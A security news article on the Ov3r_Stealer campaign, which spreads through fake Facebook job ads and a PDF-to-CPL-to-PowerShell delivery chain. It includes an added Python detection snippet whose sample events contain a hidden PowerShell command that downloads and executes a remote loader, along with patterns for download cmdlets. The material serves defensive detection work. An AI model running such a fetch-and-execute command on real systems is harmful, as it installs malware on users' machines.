Fake Facebook Job Ads Spreading ‘Ov3r_Stealer’ to Steal Cryptocurrencies and Credentials


Threat actors are using fake Facebook job postings as a lure to trick potential targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer.

“This malware is designed to steal credentials and crypto wallets and send them to a Telegram channel that the threat actor monitors,” Trustwave SpiderLabs said in a report shared with The Hacker News.

Ov3r_Stealer can siphon IP address-based location, hardware information, passwords, cookies, credit card information, autofill, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the affected host.

While the exact end goal of the campaign is unknown, it is likely that the stolen information will be offered for sale to other threat actors. Another possibility is that Ov3r_Stealer will be updated over time into a QakBot-like loader for additional payloads, including ransomware.

The starting point of the attack is a weaponized PDF file that masquerades as a file hosted on OneDrive and prompts users to click an embedded “Access Document” button.

Trustwave said it identified the PDF file shared on a fake Facebook account posing as Amazon CEO Andy Jassy, and through Facebook ads for digital advertising jobs.

Users who eventually click the button are presented with an Internet shortcut file (.URL) masquerading as a DocuSign document hosted on Discord’s Content Delivery Network (CDN). The shortcut file then acts as a conduit to deliver a Control Panel Item (.CPL) file, which is then executed using the Windows Control Panel binary process (“control.exe”).

Executing the CPL file leads to retrieving a PowerShell loader (“DATA1.txt”) from a GitHub repository to finally launch Ov3r_Stealer.
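The delivery chain above (a .CPL handed to control.exe, which in turn spawns PowerShell that pulls a loader from GitHub) leaves a recognisable process-creation trail. The following is an added illustration, not code from Trustwave’s report: a small rule set run over constructed Sysmon-style process events; the field names and the sample command lines, including the placeholder GitHub repository, are assumptions.

```python
"""Flag process-creation events matching the Ov3r_Stealer delivery chain:
a .CPL launched by control.exe from a user-writable path, and a Control Panel
host (control.exe, or the rundll32.exe it hands the item to via
shell32.dll,Control_RunDLL) spawning PowerShell that fetches a remote loader.
Field names follow a Sysmon Event ID 1 shape; this is an assumption."""
import re

USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\(downloads|appdata)|temp)\\", re.I)
CPL_ARG = re.compile(r"\.cpl\b", re.I)
LOADER_FETCH = re.compile(
    r"(raw\.githubusercontent\.com|Invoke-WebRequest|DownloadString|\biwr\b|\birm\b)", re.I)

def classify(event):
    """Return the rule names an event triggers (empty list if nothing matches)."""
    hits = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    if image.endswith("\\control.exe") and CPL_ARG.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("cpl_from_user_writable_path")
    # control.exe delegates the item to rundll32.exe, so PowerShell's parent is usually rundll32.
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")) and \
            parent.endswith(("\\control.exe", "\\rundll32.exe")):
        hits.append("control_panel_spawns_powershell")
        if LOADER_FETCH.search(cmd):
            hits.append("powershell_fetches_remote_loader")
    return hits

# Constructed sample events, not taken from the report. The repository path is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\control.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" "C:\Users\alice\Downloads\DocuSign_Document.cpl"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'powershell.exe -nop -w hidden -c "iex (iwr https://raw.githubusercontent.com/PLACEHOLDER-REPO/main/DATA1.txt)"'},
    {"Image": r"C:\Windows\System32\control.exe",           # benign: built-in applet by name
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" /name Microsoft.DefaultPrograms'},
]

def scan(events):
    """Map the index of each suspicious event to the rules it triggered."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```

The rundll32-to-PowerShell rule will also fire on some legitimate administrative tooling, so in production it should be paired with the remote-fetch rule or tuned per environment.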


It’s worth noting at this stage that Trend Micro recently revealed a nearly identical infection chain used by threat actors to drop another stealer called Phemedrone Stealer by abusing the Microsoft Windows Defender SmartScreen bypass vulnerability (CVE-2023-36025, CVSS score: 8.8).

The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r_Stealer shares code-level overlaps with Phemedrone.

“This malware was recently reported and Phemedrone may have been repurposed and renamed to Ov3r_Stealer,” Trustwave said. “The main difference between the two is that Phemedrone is written in C#.”

The findings come as Hudson Rock revealed that threat actors are advertising their access to law enforcement request portals from major organizations such as Binance, Google, Meta and TikTok by misusing credentials obtained through infostealer infections.

Hudson Rock has also tracked the emergence of a category of infections called CrackedCantil that uses cracked software as an initial entry vector to drop loaders like PrivateLoader and SmokeLoader, which then act as a delivery mechanism for information stealers, crypto miners, proxy botnets, and ransomware.
